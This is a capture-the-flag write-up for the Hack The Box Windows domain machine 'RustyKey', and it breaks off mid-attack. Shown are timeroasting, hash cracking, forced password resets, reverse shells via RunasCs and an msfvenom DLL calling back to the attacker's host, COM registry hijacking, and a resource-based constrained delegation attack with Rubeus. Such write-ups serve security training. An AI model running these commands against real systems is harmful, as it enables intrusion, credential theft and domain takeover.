HTB | RustyKey

Machine - https://app.hackthebox.com/machines/RustyKey

IP - 10.129.100.71

Description - As is common in real life Windows pentests, you will start the RustyKey box with credentials for the following account: rr.parker / 8#t5HE8L!W3A

NMAP

└─$ nmap -sC -sV -p 53,88,135,139,389,445,464,3269,5985,9389,47001,49664,49666,49670,49673,49674,49677,49692,56212 10.129.100.71 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-29 11:18 IST
Nmap scan report for 10.129.100.71
Host is up (0.82s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-29 13:48:45Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
56212/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-29T13:49:44
|_  start_date: N/A
|_clock-skew: 8h00m04s

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 87.84 seconds

SMB / LDAP

└─$ netexec smb 10.129.99.237 -u rr.parker -p '8#t5HE8L!W3A'
SMB         10.129.99.237   445    10.129.99.237    [*]  x64 (name:10.129.99.237) (domain:10.129.99.237) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.129.99.237   445    10.129.99.237    [-] 10.129.99.237\\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED 

We can see that the NTLM authentication is disabled, so we switch to Kerberos and successfully authenticate:

└─$ impacket-getTGT 'rustykey.htb/rr.parker:8#t5HE8L!W3A'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in rr.parker.ccache

└─$ netexec ldap 10.129.99.237 -u rr.parker -p '8#t5HE8L!W3A' -k
LDAP        10.129.99.237   389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.129.99.237   389    DC               [+] rustykey.htb\\rr.parker:8#t5HE8L!W3A 

Bloodhound

└─$ bloodhound-python -u 'rr.parker' -p '8#t5HE8L!W3A' -d rustykey.htb -ns 10.129.100.71 -c All --zip

Got the list of usernames from the Bloodhound zip

We can see the members of Remote Management Users group, so we can somewhat guess which account would have user flag, and we can manually explore with Inbound Object Control to check the Bloodhound/AD path to them

Now we have three options EE.REED , GG.ANDERSON and BB.MORGAN

HELPDESK -> ForceChangePassword -> BB.MORGAN

Now we need to find the way to get to HELPDEK

Now we have two options either get the credentials for NN.MARCOS or IT-COMPUTER3

Foothold/ Shell

Shell as BB.Morgan

The path which will give us shell will look like IT-COMPUTER3 - > HELPDESK - > BB.MORGAN

Timeroasting

Timeroast is a technique that abuses the NTP service on a domain controller to leak MD5 password hashes for domain user accounts. These hashes can be cracked offline to recover plaintext passwords. The attack targets the Secure NTP (SNTP-MS) mechanism that encrypts NTP responses based on a user’s password.

There is a white paper for TimeRoasting (refer to this), and this git repo

Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID. This is not a problem when computer accounts are properly generated, but if a non-standard or legacy default password is set this tool allows you to brute-force those offline.

└─$ python3 timeroast.py 10.129.60.209
1000:$sntp-ms$6b739430d088d593e0679f39c8e5d424$1c0111e900000000000a0fd44c4f434cec0ecfa8ee3acad7e1b8428bffbfcd0aec0ee487464b1fb9ec0ee487464b3588
1103:$sntp-ms$fc9850f29ca329477cde72d2dd1e93cf$1c0111e900000000000a0fd44c4f434cec0ecfa8ebd0020be1b8428bffbfcd0aec0ee487f7d7ce88ec0ee487f7d86587
1104:$sntp-ms$937ddfce9fed6efecf9dde5e20eb12ef$1c0111e900000000000a0fd44c4f434cec0ecfa8ebd165b8e1b8428bffbfcd0aec0ee487f7d97f62ec0ee487f7d9acaf
1105:$sntp-ms$02ee43305a252680f77bac8462b42639$1c0111e900000000000a0fd44c4f434cec0ecfa8ed4a1c83e1b8428bffbfcd0aec0ee48809313a34ec0ee4880931afa5
1107:$sntp-ms$3a4376d1bdff7a3ee53a97830cc90b50$1c0111e900000000000a0fd44c4f434cec0ecfa8ed5649b8e1b8428bffbfcd0aec0ee488093da221ec0ee488093dc202
1106:$sntp-ms$25240db6725293f421be71632df6c008$1c0111e900000000000a0fd44c4f434cec0ecfa8ed4b6a61e1b8428bffbfcd0aec0ee4880932aea8ec0ee4880932e961
1118:$sntp-ms$0a3aec69b5c387b26b0fb061efcfdbd4$1c0111e900000000000a0fd44c4f434cec0ecfa8ed53d138e1b8428bffbfcd0aec0ee488195bf345ec0ee488195c0fcb
1119:$sntp-ms$fa9c9efec37ec2e2ea7d786a03402e75$1c0111e900000000000a0fd44c4f434cec0ecfa8ed55d29ae1b8428bffbfcd0aec0ee488195dea96ec0ee488195e1635
1120:$sntp-ms$944d9fbf111f556e8c86bf1f0c97630f$1c0111e900000000000a0fd44c4f434cec0ecfa8ed6fdf8be1b8428bffbfcd0aec0ee4881977f935ec0ee48819781fcc
1121:$sntp-ms$ce4d5392114a433ea7b3c4935e71b9b2$1c0111e900000000000a0fd44c4f434cec0ecfa8ed7155ade1b8428bffbfcd0aec0ee488197972b2ec0ee488197995ee
1122:$sntp-ms$5a7fe7ac440a4563198972c761d9e176$1c0111e900000000000a0fd44c4f434cec0ecfa8ed99780be1b8428bffbfcd0aec0ee48819a19363ec0ee48819a1b84c
1123:$sntp-ms$19dd83d824166332e08a02bfb35df35b$1c0111e900000000000a0fd44c4f434cec0ecfa8ee6bd1e0e1b8428bffbfcd0aec0ee4882e6b7faaec0ee4882e6bf51b
1125:$sntp-ms$00b0a3277cb03b54f242668e11638d98$1c0111e900000000000a0fd44c4f434cec0ecfa8eea84380e1b8428bffbfcd0aec0ee4882ea821f2ec0ee4882ea855f4
1124:$sntp-ms$2f7e53fd9cf9aef37b13059a489cc4ab$1c0111e900000000000a0fd44c4f434cec0ecfa8ee6d2b7ce1b8428bffbfcd0aec0ee4882e6cffddec0ee4882e6d414b
1126:$sntp-ms$bf2b0f76de6ddcd79fee273626014758$1c0111e900000000000a0fd44c4f434cec0ecfa8eeb30b5ae1b8428bffbfcd0aec0ee4882eb2e9ccec0ee4882eb3212a
1127:$sntp-ms$8261b4ca39a936d18d871b5dc70e2b6d$1c0111e900000000000a0fd44c4f434cec0ecfa8eed1cce6e1b8428bffbfcd0aec0ee4882ed1a4a2ec0ee4882ed1df5b

we can get the sid of IT-COMPUTER3 either from bloodhound or it’s json data

└─$ cat 20250702022932_computers.json | jq -r '.data[] | "\\(.Properties.samaccountname) \\(.ObjectIdentifier)"'  
IT-Computer5$ S-1-5-21-3316070415-896458127-4139322052-1127
IT-Computer4$ S-1-5-21-3316070415-896458127-4139322052-1126
IT-Computer3$ S-1-5-21-3316070415-896458127-4139322052-1125
IT-Computer2$ S-1-5-21-3316070415-896458127-4139322052-1124
IT-Computer1$ S-1-5-21-3316070415-896458127-4139322052-1123
Finance-Computer5$ S-1-5-21-3316070415-896458127-4139322052-1122
Finance-Computer4$ S-1-5-21-3316070415-896458127-4139322052-1121
Finance-Computer3$ S-1-5-21-3316070415-896458127-4139322052-1120
Finance-Computer2$ S-1-5-21-3316070415-896458127-4139322052-1119
Finance-Computer1$ S-1-5-21-3316070415-896458127-4139322052-1118
Support-Computer5$ S-1-5-21-3316070415-896458127-4139322052-1107
Support-Computer4$ S-1-5-21-3316070415-896458127-4139322052-1106
Support-Computer3$ S-1-5-21-3316070415-896458127-4139322052-1105
Support-Computer2$ S-1-5-21-3316070415-896458127-4139322052-1104
Support-Computer1$ S-1-5-21-3316070415-896458127-4139322052-1103
DC$ S-1-5-21-3316070415-896458127-4139322052-1000

cracking hash

We need to crack the hash for RID 1125

└─$ hashcat -m 31300 sntp_hash /home/anurag/stuff/rockyou.txt --username

we get the password for IT-Computer3$:Rusty88!

we can confirm the credential via netexec

└─$ netexec ldap 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [+] rustykey.htb\\IT-Computer3$:Rusty88! 

AddSelf to Helpdesk

└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k add groupMember "HelpDesk" "IT-Computer3$"
[+] IT-Computer3$ added to HelpDesk

Now we can change password for bb.morgan

ForceChangePassword

└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k set password bb.morgan 'P@ssw0rd@123'
[+] Password changed successfully!

When we try to validate the new credentials, we get KDC_ERR_ETYPE_NOSUPP

└─$ netexec ldap 10.10.11.75 -u 'bb.morgan' -p 'P@ssw0rd@123' -k
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [-] rustykey.htb\\bb.morgan:P@ssw0rd@123 KDC_ERR_ETYPE_NOSUPP

KDC_ERR_ETYPE_NOSUPP error indicates that the KDC does not support the encryption type our tools are using for those accounts.

Let’s look at the bloodhound result again

We can see that BB.MORGAN -> MemberOf IT -> MemberOf -> PROTECTED OBJECTS -> MemberOf -> PROTECTED USERS

The key issue is likely the PROTECTED USERS group. Users in this group have restrictions that:

1. Disallow the use of NTLM, Digest, and CredSSP.

2. Only allow Kerberos with AES encryption.

3. Disallow delegation, including unconstrained delegation.

This explains the KDC_ERR_ETYPE_NOSUPP error when using Kerberos with weak encryption or incompatible settings.

Since HELPDESK -> AddMember -> PROTECTED OBJECTS -> MemberOf -> PROTECTED USERS

We can remove IT from it and then we can change the password of BB.MORGAN and able to authenticate

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k remove groupMember "Protected Objects" "IT"
[-] IT removed from Protected Objects
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k set password bb.morgan 'P@ssw0rd@123'
[+] Password changed successfully!
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ netexec ldap 10.10.11.75 -u 'bb.morgan' -p 'P@ssw0rd@123' -k
LDAP        10.10.11.75     389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        10.10.11.75     389    DC               [+] rustykey.htb\\bb.morgan:P@ssw0rd@123 

GetTgt for bb.morgan

evil-wirm is not working so we need to get the tgt for bb.morgan

└─$ netexec smb  DC.RUSTYKEY.HTB -u rr.parker -p '8#t5HE8L!W3A' -k --generate-krb5-file krb5.conf
SMB         DC.RUSTYKEY.HTB 445    DC               [*]  x64 (name:DC) (domain:RUSTYKEY.HTB) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.RUSTYKEY.HTB 445    DC               [+] RUSTYKEY.HTB\\rr.parker:8#t5HE8L!W3A 

└─$ impacket-getTGT rustykey.htb/'bb.morgan':'P@ssw0rd@123' -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in bb.morgan.ccache

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ export KRB5CCNAME=bb.morgan.ccache 
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ export KRB5_CONFIG=./krb5.conf    

└─$ evil-winrm -r rustykey.htb -i dc.rustykey.htb
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> 

found user.txt

    Directory: C:\\Users\\bb.morgan\\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/4/2025   9:15 AM           1976 internal.pdf
-ar---         7/2/2025   3:32 AM             34 user.txt

Privilege Escalation

Shell as EE.Reed

We can see there is a pdf internal.pdf let’s copy to our machine and open it

Internal Memo
From: bb.morgan@rustykey.htb
To: support-team@rustykey.htb
Subject: Support Group - Archiving Tool Access
Date: Mon, 10 Mar 2025 14:35:18 +0100
Hey team,
As part of the new Support utilities rollout, extended access has been temporarily granted to allow
testing and troubleshooting of file archiving features across shared workstations.
This is mainly to help streamline ticket resolution related to extraction/compression issues reported
by the Finance and IT teams. Some newer systems handle context menu actions differently, so
registry-level adjustments are expected during this phase.
A few notes:
- Please avoid making unrelated changes to system components while this access is active.
- This permission change is logged and will be rolled back once the archiving utility is confirmed
stable in all environments.
- Let DevOps know if you encounter access errors or missing shell actions.
Thanks,
BB Morgan
IT Department

This memo mentions an archiving tool having unrestricted access for testing purposes. It notes that some context menus may not function correctly, and registry-level adjustments might be needed, indicating that the tool’s registry entries may have excessive permissions.

HELPDESK can change passwords for DD.ALI , EE.REED AND GG.ANDERSON as well

Since the memo was sent to SUPPORT And we know that EE.REED is a member of SUPPORT and HELPDEK can change the password, but before that before, we need to remove SUPPORT from PROTECTED OBJECT

└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k remove groupMember "Protected Objects" "SUPPORT"
[-] SUPPORT removed from Protected Objects
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k set password "ee.reed" 'P@ssw0rd@123'
[+] Password changed successfully!

not able to auth via ldap but smb we get

└─$ impacket-getTGT rustykey.htb/'ee.reed':'P@ssw0rd@123' -k
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in ee.reed.ccache
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ export KRB5CCNAME=ee.reed.ccache                                                                                                                                                                                                                                                                              
                                                                                                                                                                                                                         
┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ netexec smb DC.RUSTYKEY.HTB -u 'ee.reed' -p 'P@ssw0rd@123' -k   
SMB         DC.RUSTYKEY.HTB 445    DC               [*]  x64 (name:DC) (domain:RUSTYKEY.HTB) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.RUSTYKEY.HTB 445    DC               [-] RUSTYKEY.HTB\\ee.reed:P@ssw0rd@123 STATUS_LOGON_TYPE_NOT_GRANTED 

This error occurs because the domain join user account lacks the Access this computer from the network user right at the domain controller (DC) servicing the domain join operation.

Reverse shell

I tried PSsession but it gives error

*Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> $password = ConvertTo-SecureString "P@ssw0rd@123" -AsPlainText -Force
*Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> $cred = New-Object System.Management.Automation.PSCredential("ee.reed", $password)
*Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> hostname
dc
*Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> Enter-PSSession -ComputerName dc -Credential $cred
You are currently in a Windows PowerShell PSSession and cannot use the Enter-PSSession cmdlet to enter another PSSession.
At line:1 char:1
+ Enter-PSSession -ComputerName dc -Credential $cred
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Enter-PSSession], ArgumentException
    + FullyQualifiedErrorId : RemoteHostDoesNotSupportPushRunspace,Microsoft.PowerShell.Commands.EnterPSSessionCommand
*Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> 

we can use RunasC

*Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> .\\RunasCs.exe ee.reed P@ssw0rd@123 powershell -r 10.10.16.3:1234
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\\Desktop: Service-0x0-dc3160d$\\Default
[+] Async process 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' with pid 21192 created in background.

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ nc -nlvp 1234                                               
listening on [any] 1234 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.75] 53867
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\\Windows\\system32> whoami
whoami
rustykey\\ee.reed
PS C:\\Windows\\system32> 

Shell as mm.turner

Writable Registry

We can use the below script to check for writable registry keys under HKLM:\\SOFTWARE

Get-ChildItem HKLM:\\SOFTWARE -Recurse -ErrorAction SilentlyContinue | Where-Object {
    try {
        $keyPath = $_.Name.Replace('HKEY_LOCAL_MACHINE\\', '')
        $regKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($keyPath, $true)
        $regKey.SetValue('TestWrite','1')
        $regKey.DeleteValue('TestWrite')
        $true
    } catch {
        $false
    }
}

This gives us many registry for 7-zip

    Hive: HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}

Name                           Property                                                                                
----                           --------                                                                                
InprocServer32                 (default)      : C:\\Program Files\\7-Zip\\7-zip.dll                                       
                               ThreadingModel : Apartment                                                              

We see that the InprocServer32 registry has a COM server DLL pointing to C:\\Program Files\\7-Zip\\7-zip.dll that gets loaded into the client process when this CLSID is used.

Checking the ACLs for this registry, we see that members of the Support domain group have full control over it:

PS C:\\temp> Get-Acl 'HKLM:\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32' | fl
Get-Acl 'HKLM:\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32' | fl

Path   : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-0001000
         20000}\\InprocServer32
Owner  : BUILTIN\\Administrators
Group  : RUSTYKEY\\Domain Users
Access : APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow  ReadKey
         BUILTIN\\Administrators Allow  FullControl
         CREATOR OWNER Allow  FullControl
         RUSTYKEY\\Support Allow  FullControl
         NT AUTHORITY\\SYSTEM Allow  FullControl
         BUILTIN\\Administrators Allow  FullControl
         BUILTIN\\Users Allow  ReadKey
Audit  : 
Sddl   : O:BAG:DUD:AI(A;CIID;KR;;;AC)(A;ID;KA;;;BA)(A;CIIOID;KA;;;CO)(A;CIID;KA;;;S-1-5-21-3316070415-896458127-4139322
         052-1132)(A;CIID;KA;;;SY)(A;CIIOID;KA;;;BA)(A;CIID;KR;;;BU)

COM Hijacking

Feature	DLL Hijacking	COM Hijacking
Target	Executables and DLL loading	Registry-based COM class loading
Vector	Search order abuse	Registry redirection of CLSID or ProgID
Persistence?	No (unless abused in autostart apps)	Yes — hijacked COM objects persist
PrivEsc?	Yes, if hijacked process runs as SYSTEM	Yes, if hijacked COM object runs as SYSTEM
Ease of detection	Medium (DLL file on disk)	Harder — resides in the registry
Trigger Method	App must load the DLL	COM object must be instantiated

We first generate a reverse shell payload in .dll format using msfvenom:

└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.3 LPORT=9001 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll

We then transfer the payload to the target host and point the InprocServer32 registry at the full path of the .dll file

After few seconds, we get a reverse shell as the mm.turner user on our listener

PS C:\\temp> Set-ItemProperty -Path "HKLM:\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32" -Name "(Default)" -Value "C:\\temp\\shell.dll"
Set-ItemProperty -Path "HKLM:\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32" -Name "(Default)" -Value "C:\\temp\\shell.dll"
PS C:\\temp> reg query "HKLM\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32"
reg query "HKLM\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32
    (Default)    REG_SZ    C:\\temp\\shell.dll
    ThreadingModel    REG_SZ    Apartment

PS C:\\temp> 

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ nc -nlvp 9001                       
listening on [any] 9001 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.75] 57283
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\\Windows>whoami
whoami
rustykey\\mm.turner

C:\\Windows>

Shell as Administrator

Looking at the bloodhound we know that MM.TURNER -> MemberOf DELEGATIONMANAGER -> AddAllowedToAct -> DC.RUSTYKEY

The members of the group DELEGATIONMANAGER@RUSTYKEY.HTB have can modify the msds-AllowedToActOnBehalfOfOtherIdentity attribute on the computer DC.RUSTYKEY.HTB.

The ability to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property allows an attacker to abuse resource-based constrained delegation (RBCD) to compromise the remote computer system.

We can either use a controlled user account that we can set an SPN for (dd.ali) or a controlled machine account (IT-Computer3$) for this attack. We also require the Rubeus.exe tool, since we're performing it from a Windows host:

RBCD Attack (Machine Account)

We first retreive the security identifier (SID) of the IT-Computer3$ machine account:

PS C:\\temp> $ComputerSid = Get-DomainComputer IT-Computer3 -Properties objectsid | Select -Expand objectsid
$ComputerSid = Get-DomainComputer IT-Computer3 -Properties objectsid | Select -Expand objectsid
PS C:\\temp> 

We then build a generic ACE with the SID as the principal(new DACL with IT-Computer3$’s SID that grants it GenericAll rights), and get the binary bytes for the new DACL/ACE, which will be needed for setting the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.

PS C:\\temp> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
PS C:\\temp> $SDBytes = New-Object byte[] ($SD.BinaryLength)
$SDBytes = New-Object byte[] ($SD.BinaryLength)
PS C:\\temp> $SD.GetBinaryForm($SDBytes, 0)
$SD.GetBinaryForm($SDBytes, 0)
PS C:\\temp> 

Next, we set this security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the domain controller

This step effectively allows IT-Computer3$ to impersonate any user when accessing the DC.

PS C:\\temp> Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
PS C:\\temp> 

We then use Rubeus to hash the plaintext password of IT-Computer3$ into its RC4_HMAC form:

PS C:\\tem> ./R.exe hash /password:Rusty88!
./R.exe hash /password:Rusty88!

[*] Action: Calculate Password Hash(es)

[*] Input password             : Rusty88!
[*]       rc4_hmac             : B52B582F02F8C0CD6320CD5EAB36D9C6

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

PS C:\\tem> 

Finally, we use the s4u module of Rubeus to get a service ticket for the backupadmin user, which is a member of Domain Admins:

PS C:\\tem> ./R.exe  s4u /user:IT-Computer3$ /rc4:B52B582F02F8C0CD6320CD5EAB36D9C6 /impersonateuser:backupadmin /msdsspn:cifs/DC.rustykey.htb /nowrap
./R.exe  s4u /user:IT-Computer3$ /rc4:B52B582F02F8C0CD6320CD5EAB36D9C6 /impersonateuser:backupadmin /msdsspn:cifs/DC.rustykey.htb /nowrap
[*] Action: S4U

[*] Using rc4_hmac hash: B52B582F02F8C0CD6320CD5EAB36D9C6
[*] Building AS-REQ (w/ preauth) for: 'rustykey.htb\\IT-Computer3$'
[*] Using domain controller: fe80::d98:ec14:263a:b635%11:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFmDCCBZSgAwIBBaEDAgEWooIEqDCCBKRhggSgMIIEnKADAgEFoQ4bDFJVU1RZS0VZLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMcnVzdHlrZXkuaHRio4IEYDCCBFygAwIBF6EDAgECooIETgSCBEqjI6o/cMuKnrnmTq+NiMN0NN2lU0sIo74gbw6ZEwn/S2YK/GfQ1Yten6pBi04c16ZYeNwSFqHyosjJoe8hWThHlq9SZH1x051T1CfEOub7ZNYNurzA6Qpy3c5CVji9ejD60zCtPi1uUw1g0UwXIRjPaPIsGgz4RQkgiYi/IN17DWkelc3dHCs/1sBHsSS3sGlVQGQyCcnIGZcHamMRqA3SW+wXwg0FyiQI5I9SUpLXB73OHnGxlWYvrKPTaQrocxciqtpii/WIdo7Z+FTO2d2vCcKiIGnW1mZu7rHsP2d9S+XtMBErMt3XKWQj1mId+9w1lqZEhL9FYhWpZ8ORamn1Dimq6MXxI9n8Up1S4iBcyIoUZOIEmGxu8+E7clzdppcwbc0vTN7AWwXQaVjGng2oDFf5mzoGyaAhJQ2/Lq6zQDbg+IbsUPE9KlQERn3bQuWrPOjIS1UlkgtwEYap5zDZW2wEiWNuCeOrKg9KCAcNZkJNjB8u+6ndL8bSzGujMAvHugtAjgGUHYKwG79JzJCn5uR6ZM2exm0deUwTv9L9off2yZ8ZafQ9zgXpB5c8dkZfZToCdQGkrqvaGeA6I14QIFGZISn0umw8n3xl7YGQUq208hWl65XpOKWPJCpxS34QsKOWkTsPrWbZS+K4oOGE3qvrXtDY8W1IjTPx3RX7BLiR9nFmtO0S45LHMCmzk4f5hIi3hjfR944wCTMFQvZe7U3ZmG5mU5dWl/E9QxjwjpFXaKH+IE2ouTVkmOEdHmxcp2Y4hnxuaYqLTt/GINdRCzXwrHRtF3NSpeIgAxSPz1ZSGUAwNFynGLLEvzcSwUg/eqmJsXvw4t1mpGPGGdFudY0+uIZLe8dj9xr98Sca4trIqWAQ16ob7YJ/1VDBHKC9QLUZ/sgAXosaHIRxYV6WZ5dZxQpGfjCR+XrVr9St+DkhgkenaiDjrKH61XznOURMa7oI/BcjSRJ1N9Yv3ODDaj1xzgCYZwiZrNjW2sI1z2JtuhC0RxIOzhifntI04mr8STQeuJPsGwtC9xL75TJxy6SVtomUW8S0wmOrDM8AuQe3RW3B0WPnr9I69Hp1H9QhXRetSpVYwT+fFeLcmFVrrRo2hheh4AQNXGbUdPM9B0Aeh88NEz8MIARdz1BmXEAMENGrszYNZMQJrHmtQE4acsZFfR6VLWPqkIJYQLCzAWD2Lx6w6A2cLsi/FTe3B2Yr/rbvbvfBmg6i9QKEoVn72DGDkraC7+veP6cMxLdG6T5BNcjcvkxrpSKzF5arby7PiWlUDa+dHV0/htEMtXIDVoHGBkoCdWGzDW7CGIpZQB44Q5NNRPj71chok4XxRIwSBmcv5GGHGK6OXpL3ZgNPG8H+N/pi9KQe5OzfAjJNfA5isv7LYuOdHU50YbYfEkCKLbyWq1pxCeTWDAxIZV0zs5eGQVeAYeBPh7ruyvBAiy0io1dysUSkHEijgdswgdigAwIBAKKB0ASBzX2ByjCBx6CBxDCBwTCBvqAbMBmgAwIBF6ESBBC/yFmSKrMGDouZMGNIWAcOoQ4bDFJVU1RZS0VZLkhUQqIaMBigAwIBAaERMA8bDUlULUNvbXB1dGVyMySjBwMFAEDhAAClERgPMjAyNTA3MDMyMjI4MzNaphEYDzIwMjUwNzA0MDgyODMzWqcRGA8yMDI1MDcxMDIyMjgzM1qoDhsMUlVTVFlLRVkuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxydXN0eWtleS5odGI=

[*] Action: S4U

[*] Building S4U2self request for: 'IT-Computer3$@RUSTYKEY.HTB'
[*] Using domain controller: dc.rustykey.htb (fe80::d98:ec14:263a:b635%11)
[*] Sending S4U2self request to fe80::d98:ec14:263a:b635%11:88
[+] S4U2self success!
